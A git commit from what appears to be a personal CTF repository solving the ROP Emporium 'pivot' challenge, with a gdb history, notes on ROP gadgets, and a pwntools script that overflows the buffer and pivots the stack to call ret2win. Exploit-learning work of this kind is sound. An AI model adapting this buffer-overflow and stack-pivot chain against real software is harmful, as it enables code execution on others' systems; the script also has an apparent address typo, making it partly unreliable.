new file: x86_64/pivot/exploit.py

new file:   x86_64/pivot/gadgets
This commit is contained in:
Brett Weiland 2020-12-18 19:06:39 -06:00
parent 406768c5fe
commit a6439b8ec3
5 changed files with 244 additions and 0 deletions

145
x86_64/pivot/.gdb_history Normal file
View File

@ -0,0 +1,145 @@
starti
context
break *pwnme
continue
context
x/i 0x7f2041e78f10
stepi
return
stepi
nexti
nexti
stepi
return
nexti
q
quit
exit
exit
quit
quit
quit
quit
continue
stepi
quit
quit
continue
stepi
return
nexti
asdf
continue
nexti
continue
nexti
continue
context
help
nexti
quit
quit
continue
continue
quit
quit
continue
stepi
nexti
quit
quit
continue
nexti
quit
continue
exit
quit
continue
quit
continue
quit
continue
continue
quit
continue
break *pwnme + 181
continue
x/i pwnme + 181
x/i *pwnme + 181
x/i *pwnme + 180
x/i *pwnme
x/100i *pwnme
x/10i *pwnme
x/20i *pwnme
x/30i *pwnme
x/20i *pwnme
quit
continue
stepi
stepi
stepi
stepi
info reg rax
stepi
stepi
info reg rsp
x/x rsp
x/x $rsp
x/x *$rsp
x/x $rsp
quit
continue
Quit
quit
continue
continue
quit
continue
continue
quit
continue
quit
continue
continue
continue
quit
continue
nexti
quit
continue
nexti
x/x $edi
nexti
nexti
x/x $edi
nexti
x/i 0x7f3a079a95a3
quit
continue
continue
quit
quit
continue
quit
continue
continue
nexti
nexti
info reg rax
x/x $rax
stepi
stepi
stepi
stepi
return
context
stepi
info reg rbp
stepi
info reg rbp
stepi
info reg rax
info reg rbp
info 0x60103a
x/x 0x60103a
quit

43
x86_64/pivot/exploit.py Executable file
View File

@ -0,0 +1,43 @@
#!/usr/bin/env python3
from pwn import *
from os import getcwd
import re
#context.terminal = ['kitty', 'sh', '-c']
print(context.terminal)
prog = gdb.debug('./pivot', gdbscript='''
b pwnme
b *0x4009a5
'''
)
payload = b''
payload += p64(0x0000000000400720) # foothold@plt
payload += p64(0x4009bb) # pop rax
payload += p64(601040) # foothold@plt's .got.plt entry
payload += p64(0x00000000004007c8) # pop rbp
payload += p64(279) # should be the offset of pwnem from foothold's .got.plt
payload += p64(0x4009c4) # adds the two
payload += p64(0x00000000004007c1) # jmp rax
prog.sendline(payload)
pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
print(hex(pivit_location))
payload = b''
#buffer overflow
for c in range(40):
payload += b'a'
payload += p64(0x4009bb) # pop rax
payload += p64(pivit_location) # pivot location
payload += p64(0x4009bd) # xchg rsp,rax
prog.sendlineafter('Now please send your stack smash', payload)
prog.interactive()

44
x86_64/pivot/gadgets Normal file
View File

@ -0,0 +1,44 @@
Goal is to call ret2win from libpivot
we don't know where ret2win is, but we do know where foothold_function is
pivot is at 0x7f2041e78f10
0x0000000000400720 : foothold_function@plt
0x000000000000096a : foothold_function
resolve ret2win:
1: resolve foothold_function
resolved foothold: [0x400720 + 0x20091a]
offset of foothold vs
2: ret2win = [0x400720 + 0x20091a] + 279
64 rop chains possible at 0x7eff3d368f10
6 rop chains possible at buffer overflow
0x00000000004007c8 : pop rbp ; ret
0x00000000004007c1 : jmp rax
00000000004009bb <usefulGadgets>:
4009bb: 58 pop rax
4009bc: c3 ret
4009bd: 48 94 xchg rsp,rax
4009bf: c3 ret
4009c0: 48 8b 00 mov rax,QWORD PTR [rax]
4009c3: c3 ret
4009c4: 48 01 e8 add rax,rbp
4009c7: c3 ret
1: resolve foothold (2)
4: pop rax (rax is 0x400720 + 0x20091a)
5: pop rbp (rpb is 279)
6: add rax, rbp
7: mov rax, [rax]
8: jmp rax
2: pop rax (4)
3: xchg rsp,rax (5)

BIN
x86_64/pivot/stest Normal file

Binary file not shown.

12
x86_64/pivot/test Normal file
View File

@ -0,0 +1,12 @@
pivot by ROP Emporium
x86_64
Call ret2win() from libpivot
The Old Gods kindly bestow upon you a place to pivot: 0x7f93a9160f10
Send a ROP chain now and it will land there
> Thank you!
Now please send your stack smash
> Thank you!
Exiting